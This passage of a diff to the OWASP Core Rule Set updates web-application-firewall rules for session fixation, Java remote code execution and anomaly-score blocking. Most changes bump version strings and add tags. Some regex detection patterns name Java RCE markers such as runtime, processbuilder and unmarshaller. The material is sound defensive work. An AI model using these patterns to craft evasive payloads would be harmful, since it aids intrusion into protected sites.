+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
-SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|cfid|cftoken|cfsid|jservsession|jwsession)$" \
+SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|sessionid|cfid|cftoken|cfsid|jservsession|jwsession|_flask_session|_session_id|connect\.sid|laravel_session)$" \
     "id:943110,\
     phase:2,\
     block,\
@@ -63,8 +64,9 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio
     tag:'attack-fixation',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SESSION-FIXATION',\
     tag:'capec/1000/225/21/593/61',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.943110_matched_var_name=%{matched_var_name}',\
     chain"
@@ -76,7 +78,7 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio
             setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
-SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|cfid|cftoken|cfsid|jservsession|jwsession)$" \
+SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|sessionid|cfid|cftoken|cfsid|jservsession|jwsession|_flask_session|_session_id|connect\.sid|laravel_session)$" \
     "id:943120,\
     phase:2,\
     block,\
@@ -90,8 +92,9 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio
     tag:'attack-fixation',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SESSION-FIXATION',\
     tag:'capec/1000/225/21/593/61',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.943120_matched_var_name=%{matched_var_name}',\
     chain"
@@ -102,24 +105,24 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
index c3ced4f59..143a421f0 100644
--- a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
+++ b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -13,8 +13,8 @@
 #
 # Many rules check request bodies, use "SecRequestBodyAccess On" to enable it on main modsecurity configuration file.
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -44,9 +44,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/137/6',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -63,8 +64,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
 # java. unmarshaller or base64data to trigger a potential payload execution
 # tested with https://www.exploit-db.com/exploits/42627/ and https://www.exploit-db.com/exploits/43458/
 
-SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \
-    "@rx (?:runtime|processbuilder)" \
+SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?:runtime|processbuilder)" \
     "id:944110,\
     phase:2,\
     block,\
@@ -77,12 +77,13 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
-    SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?:unmarshaller|base64data|java\.)" \
+    SecRule MATCHED_VARS|XML:/*|XML://@* "@rx (?i)(?:unmarshaller|base64data|java\.)" \
         "setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
         setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
@@ -102,9 +103,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule MATCHED_VARS "@rx (?:runtime|processbuilder)" \
@@ -134,9 +136,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -173,8 +176,9 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
     tag:'attack-injection-java',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -220,16 +224,17 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/137/6',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -258,9 +263,10 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/137/6',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -290,9 +296,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -311,9 +318,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -332,9 +340,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -356,9 +365,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -381,16 +391,17 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
@@ -415,16 +426,17 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
     tag:'attack-rce',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/248',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
@@ -451,9 +463,10 @@ SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUE
     tag:'attack-rce',\
     tag:'paranoia-level/4',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-JAVA',\
     tag:'capec/1000/152/137/6',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-949-BLOCKING-EVALUATION.conf b/rules/REQUEST-949-BLOCKING-EVALUATION.conf
index 469d8e26b..daa6acc11 100644
--- a/rules/REQUEST-949-BLOCKING-EVALUATION.conf
+++ b/rules/REQUEST-949-BLOCKING-EVALUATION.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -24,7 +24,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \
@@ -34,7 +34,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'"
 
 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \
@@ -44,7 +44,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \
@@ -54,7 +54,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'"
 
 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \
@@ -64,7 +64,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \
@@ -74,7 +74,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'"
 
 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \
@@ -84,7 +84,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \
@@ -94,7 +94,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'"
 
 # at start of phase 2, we reset the aggregate scores to 0 to prevent duplicate counting of per-PL scores
@@ -106,7 +106,7 @@ SecAction \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_inbound_anomaly_score=0'"
 
 SecAction \
@@ -116,7 +116,7 @@ SecAction \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_inbound_anomaly_score=0'"
 
 # Summing up the blocking and detection anomaly scores in phase 2
@@ -128,7 +128,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \
@@ -138,7 +138,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'"
 
 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \
@@ -148,7 +148,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \
@@ -158,7 +158,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'"
 
 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \
@@ -168,7 +168,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \
@@ -178,7 +178,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'"
 
 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \
@@ -188,7 +188,7 @@ SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'"
 
 SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \
@@ -198,7 +198,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \
     t:none,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'"
 
 
@@ -217,7 +217,7 @@ SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_thresh
     msg:'Inbound Anomaly Score Exceeded in phase 1 (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\
     tag:'anomaly-evaluation',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     chain"
